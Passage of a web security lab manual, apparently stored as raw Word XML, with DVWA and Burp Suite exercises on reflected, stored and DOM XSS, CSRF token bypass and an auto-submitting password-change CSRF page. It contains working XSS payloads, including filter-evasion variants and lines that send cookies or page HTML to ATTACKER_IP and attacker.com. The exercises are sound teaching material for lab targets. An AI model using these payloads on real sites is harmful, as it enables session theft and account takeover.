        <w:t xml:space="preserve"> (XSS in decimal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47915923" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Case manipulation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;ScRiPt&gt;alert('XSS')&lt;/sCrIpT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E157593" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Whitespace: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C446C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Comment stripping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;script&gt;al/*comment*/ert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E9A9AA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7: Capture Reflected XSS in Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1ED512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Burp Suite Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE0E62F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Submit XSS payload through DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEB8054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Inspect request in Burp: Note how payload appears in query parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A6D5AF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Inspect response: Note how payload appears unencoded in HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266052C6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Right-click response → Save response to file for documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5854323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2B: Stored XSS on DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31187D32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Access Stored XSS Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1387A6A2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DVWA, select "Stored Cross Site Scripting (XSS)" from menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5610428F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Ensure Security Level is "Low"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D63A25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module has name and message input fields that store data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D81813F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Store Basic XSS Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4825A1" w14:textId="77777777" w:rsidR="0000000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 "Name" field, enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D85FDE" w14:textId="77777777" w:rsidR="0000000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 "Message" field, enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('Stored XSS - Executes Every Time')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E27AFA" w14:textId="77777777" w:rsidR="0000000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"Submit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C948C8E" w14:textId="77777777" w:rsidR="0000000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Expected Result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Alert displays immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E10537" w14:textId="77777777" w:rsidR="0000000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Critical Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Refresh page - Alert displays again (proof of persistence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489202D2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Persistent Data Theft Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2483053D" w14:textId="77777777" w:rsidR="00000000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Clear fields and refresh to bypass stored alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516CAB8F" w14:textId="77777777" w:rsidR="00000000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 "Name" field, enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FE61D8" w14:textId="77777777" w:rsidR="00000000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"Message" field, enter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FC6D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&lt;img src=x onerror="fetch('http://ATTACKER_IP:8000/?cookie='+document.cookie)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740516B0" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000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"Submit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0244602B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000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Set up HTTP server: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1429F969" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000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Every time any user views this message, their cookie is transmitted to attacker's server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2951F5EF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Email/Form Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48549290" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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"Message" field, enter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8775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&lt;form action="http://attacker.com/steal.php" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD45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&lt;input type="hidden" name="data" value=""&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3272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&lt;input type="submit" value="Click here to continue"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C51C59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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7816FF82" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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When displayed, users see a clickable form that submits to attacker's server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2555188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Redirect Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9A1DD9" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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"Message" field, enter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F77F9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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA03B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setTimeout(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232DF2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window.location='http://phishing-site.com';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B7433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}, 3000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759B14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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59794181" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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After 3 seconds, page redirects to attacker's phishing site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2CDA7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6: Verify Data Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012846B4" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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the database entries using SQL injection knowledge from Lab 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D225D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Query the database to confirm malicious scripts are stored:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8BFB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SELECT * FROM guestbook;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0437F3BF" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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that scripts persist even after application restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718EAB65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2C: DOM-based XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095226B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Access DOM-based XSS Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA34ECF" w14:textId="77777777" w:rsidR="00000000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In DVWA, select "DOM-based Cross Site Scripting (XSS)" from menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2713345E" w14:textId="77777777" w:rsidR="00000000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Ensure Security Level is "Low"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CCB378" w14:textId="77777777" w:rsidR="00000000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module uses JavaScript to handle user input on client-side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160DDAB6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Identify Vulnerable JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8C42F9" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Right-click page → View Page Source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF20F8B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Look for JavaScript handling user input (typically in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> tags)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304B0D1B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Identify functions like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>innerHTML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eval()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document.write()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4294D5" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Common vulnerable code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775488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document.getElementById('output').innerHTML = userInput;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01157B89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Basic DOM XSS Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3030FA6E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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 the input field, enter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror="alert('DOM XSS')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620428A0" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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"Submit" or trigger the vulnerable function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54975F39" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Expected Result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Alert displays, confirming client-side code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2CEED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Hash-based DOM XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD28AFD" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Some applications pass data via URL hash (fragment): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>page.html#&lt;payload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242AD531" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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DVWA, the vulnerable function might be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4185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var input = window.location.hash.substring(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9846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document.getElementById('output').innerHTML = input;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E07B8B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Craft URL: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>http://DVWA_IP/page.html#&lt;svg onload="alert('DOM XSS via hash')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F033E6" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Send this URL to victim; JavaScript executes without server involvement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4203E56E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Query Parameter DOM XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8595DD" w14:textId="77777777" w:rsidR="00000000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If vulnerable function uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>window.location.search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>document.location.href</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D2FE26" w14:textId="77777777" w:rsidR="00000000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Craft URL: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>http://DVWA_IP/page.php?param=&lt;img src=x onerror="alert('DOM XSS')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766CE0DA" w14:textId="77777777" w:rsidR="00000000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Confirm execution in victim's browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FAFE5C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6: Data Exfiltration via DOM XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFCF04E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Inject code that extracts page content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9BB4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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46760B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fetch('http://attacker.com/log?data=' + encodeURIComponent(document.body.innerHTML));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399894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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D97C816" w14:textId="77777777" w:rsidR="00000000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steals entire page HTML including sensitive information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3AD3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Lab 2 Documentation Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6379CE4E" w14:textId="77777777" w:rsidR="00000000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reflected XSS payload and alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC7BAC" w14:textId="77777777" w:rsidR="00000000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stored XSS persistence (before and after page refresh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5551608E" w14:textId="77777777" w:rsidR="00000000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stored XSS database entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF21715" w14:textId="77777777" w:rsidR="00000000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DOM XSS page source showing vulnerable code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6C3EE5" w14:textId="77777777" w:rsidR="00000000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Proof of data exfiltration (HTTP server logs showing stolen data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B5AEDC" w14:textId="77777777" w:rsidR="00000000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Comparison table of XSS types with impact assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F01F554" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00A65FA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A65FAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="18E1908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92D7554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3: CSRF Token Bypass and Session Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFADAD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ABA88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Understand CSRF vulnerabilities and session management weaknesses using Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D254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3A: CSRF Token Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373BCD4A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Enable Burp Suite CSRF Token Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3F6814" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778872B9" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Navigate to Proxy tab → Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A60A88" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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 "Responses", check "Highlight CSRF tokens" and "Track token values"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EEEFD4" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Set proxy to listen on localhost:8080 in Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D736B7B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Access DVWA CSRF Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF5B39" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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DVWA, navigate to "CSRF"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B7831" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Ensure Security Level is "Low"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8ECB82" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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module typically shows "Change your email address" form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A224704" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Fill in a new email and prepare to submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400B49FB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Intercept CSRF Token Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2200BF" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Burp Suite, enable Intercept in Proxy tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F835BB5" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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On DVWA page, click "Change" to submit form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D61EAB2" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Intercept request in Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7075947D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Examine Request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CE79D7" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Look for CSRF token parameter (often named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>csrf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token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_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312525D1" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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the token value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79288E4D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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 HTTP method (GET/POST), Content-Type, and all parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E815D6" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Allow request to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199A81F2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CSRF Token Validation Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5777D42A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Change email to different value and submit again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B133264" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Intercept new request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A80E5B8" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Compare Tokens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF990F2" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Is token the same? (Reusable - HIGH RISK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3A6A3B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Is token different? (Per-request - BETTER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0A3CDD" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Burp Repeater:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CDC58D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Copy first request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56206ED7" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Change email parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354905EC" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Keep old CSRF token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D750414" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Send request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A48D6" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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If accepted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Token validation is weak or non-existent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A38FDD9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CSRF Token in GET Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776F724D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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If token is in URL: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>/page.php?csrf=abc123&amp;email=new@email.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0980F993" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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is vulnerable because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F32AC9" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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URLs appear in browser history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BD2535" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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URLs logged in proxy logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4920F7" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Shared in referrer headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7982A534" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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 by modifying URL directly without proper token validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2408B74D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6: Null/Empty Token Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6CBEBD" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Burp Repeater, remove CSRF token parameter entirely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDE5A96" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Send request with email change but no token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20460522" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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If successful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Application doesn't properly validate token presence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393FBE9F" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Replace token value with empty string: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>token=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D80A85C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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If successful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Another bypass indication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC7C005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3B: CSRF Exploitation with HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291E3731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Create CSRF Attack HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07380F32" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Create file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>csrf_attack.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CABB4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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32281E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&lt;body onload="document.csrf_form.submit()"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482B1B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&lt;form name="csrf_form" action="http://DVWA_IP/DVWA/vulnerabilities/csrf/" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BC1C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&lt;input type="hidden" name="password_new" value="hacked123"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A1029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&lt;input type="hidden" name="password_conf" value="hacked123"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EDA7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&lt;input type="hidden" name="Change" value="Change"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2241FC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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587071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&lt;img src="http://DVWA_IP/track_request" width="0" height="0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAF79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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E00C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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F6DA6" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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form auto-submits when victim visits the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2E31A6" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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CSRF protection is absent, password changes automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09339DED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Host Attack Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3E40CD" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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 HTML file and host on simple HTTP server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B48B8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python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE204F7" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Access at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>http://attacker-ip:8000/csrf_attack.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE54715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Test CSRF Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E4B1D0" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Log into DVWA with test account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8679D0" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Visit attacker's CSRF page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FC0724" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Check if password was changed without explicit confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AABD1B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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If successful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: CSRF protection is absent or bypassable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F25842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3C: Session Management and Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4BDA15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Identify Session Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA3284" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Burp Suite Proxy, capture DVWA request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2670D875" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Look for Set-Cookie headers in response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522CC690" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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PHPSESSID=abc123def456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACA55C9" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Check for security flags: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
